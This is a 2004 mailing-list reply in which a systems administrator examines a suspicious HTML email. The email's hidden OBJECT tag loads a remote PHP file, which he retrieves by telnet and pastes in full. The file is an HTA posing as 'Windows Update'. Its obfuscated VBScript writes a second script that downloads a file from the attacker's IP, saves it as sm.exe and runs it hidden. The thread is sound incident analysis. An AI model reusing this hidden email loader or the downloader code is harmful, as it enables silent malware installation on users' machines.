Re: interesting email...

18 Mar 2004 14:55:59 -0000 

[EMAIL PROTECTED] said:
> <html><body> <font  face="System"> <OBJECT STYLE="display:none" DATA="http://
> 68.115.29.29:81/679186.php"> </OBJECT></body></html>

> Tried to go to the site without the php file but got nothing. appears to
> point to a home user of broadbands machine. Possibly trojaned??? Anyone got
> the guts to chech out the php script? I don't! :)


Doesn't mean much to me, but here's what's there:


[EMAIL PROTECTED] owen]$ telnet 68.115.29.29 81
Trying 68.115.29.29...
Connected to 68.115.29.29.
Escape character is '^]'.

get /679186.php

HTTP/1.1 200 OK
Connection: close
Content-Type: application/hta

<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" 
CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" 
SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" 
WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BD" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.115.29.29:81/ukjtpxv.jpeg"";, False" & 
vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "BD = xml.ResponseBody" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "A=A=A=A" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BD" & vbcrlf
TSO.write "b=b=b=b" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
</SCRIPT>
<script>window.close()</script>
</HEAD>
</HTML>Connection closed by foreign host.

Owen


--
 Via Net.Works UK Ltd
 Local Touch Global Reach 
 Owen McShane                   Systems Administrator
 http://www.vianetworks.co.uk   Tel +44 (0)1925 484444

Reply via email to